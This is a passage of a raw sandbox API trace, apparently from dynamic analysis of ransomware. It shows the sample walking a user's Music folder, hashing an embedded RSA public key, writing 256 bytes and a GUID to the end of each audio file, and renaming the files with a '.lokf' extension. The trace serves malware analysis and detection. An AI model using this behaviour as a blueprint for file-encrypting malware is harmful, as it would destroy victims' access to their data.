hHeap=0x660000) returned 1 [0060.865] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\") returned="JkVomBM7vh9EmuD_aJp\\" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\") returned="iCD5MmspTIMUES\\" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86800 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86800 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.866] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.866] PathFindFileNameW (pszPath="") returned="" [0060.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f10f590, ftCreationTime.dwHighDateTime=0x1d4d459, ftLastAccessTime.dwLowDateTime=0xedf12cb0, ftLastAccessTime.dwHighDateTime=0x1d4ca2a, ftLastWriteTime.dwLowDateTime=0xedf12cb0, ftLastWriteTime.dwHighDateTime=0x1d4ca2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.866] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f10f590, ftCreationTime.dwHighDateTime=0x1d4d459, ftLastAccessTime.dwLowDateTime=0xedf12cb0, ftLastAccessTime.dwHighDateTime=0x1d4ca2a, ftLastWriteTime.dwLowDateTime=0xedf12cb0, ftLastWriteTime.dwHighDateTime=0x1d4ca2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.867] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0732da0, ftCreationTime.dwHighDateTime=0x1d4cdb5, ftLastAccessTime.dwLowDateTime=0x55c89d10, ftLastAccessTime.dwHighDateTime=0x1d4d367, ftLastWriteTime.dwLowDateTime=0x55c89d10, ftLastWriteTime.dwHighDateTime=0x1d4d367, nFileSizeHigh=0x0, nFileSizeLow=0xedb3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0WbfV oRFZMhu.mp3", cAlternateFileName="0WBFVO~1.MP3")) returned 1 [0060.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.867] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\0WbfV oRFZMhu.mp3") returned=".mp3" [0060.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\0WbfV oRFZMhu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\0wbfv orfzmhu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.867] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=60851) returned 1 [0060.867] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.869] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xed8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.869] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.870] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.870] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xedb3, lpOverlapped=0x0) returned 1 [0060.871] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.871] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.871] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.871] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.871] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.871] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.871] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.872] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.872] GetLastError () returned 0x0 [0060.872] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.872] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.872] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.872] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.872] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.872] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.872] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.872] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.873] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xedb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.873] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.873] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.873] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.873] CloseHandle (hObject=0x5cc) returned 1 [0060.874] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\0WbfV oRFZMhu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\0wbfv orfzmhu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\0WbfV oRFZMhu.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\0wbfv orfzmhu.mp3.lokf")) returned 1 [0060.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.875] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.876] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7373ca70, ftCreationTime.dwHighDateTime=0x1d4d41f, ftLastAccessTime.dwLowDateTime=0x27dd4c10, ftLastAccessTime.dwHighDateTime=0x1d4cb7a, ftLastWriteTime.dwLowDateTime=0x27dd4c10, ftLastWriteTime.dwHighDateTime=0x1d4cb7a, nFileSizeHigh=0x0, nFileSizeLow=0x13de8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sKttn2.m4a", cAlternateFileName="")) returned 1 [0060.876] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\sKttn2.m4a") returned=".m4a" [0060.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\JkVomBM7vh9EmuD_aJp\\sKttn2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\jkvombm7vh9emud_ajp\\skttn2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.876] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=81384) returned 1 [0060.876] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.878] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13dc2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.878] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.879] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13de8, lpOverlapped=0x0) returned 1 [0060.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.880] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.880] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.881] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.881] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.881] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.881] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.881] GetLastError () returned 0x0 [0060.881] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.881] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.881] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.881] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.881] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x13df0) returned 0x9c8dae8 [0060.881] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86848 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c860a0 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86890 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c860b8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c860e8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86100 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.882] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860e8 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86100 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86100 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c860e8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86100 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c860e8 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.883] GetCurrentThreadId () returned 0x9e0 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8bcb0 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.883] GetCurrentThreadId () returned 0x9e0 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.883] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.883] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.883] HeapFree (in: hHeap=0x660000, 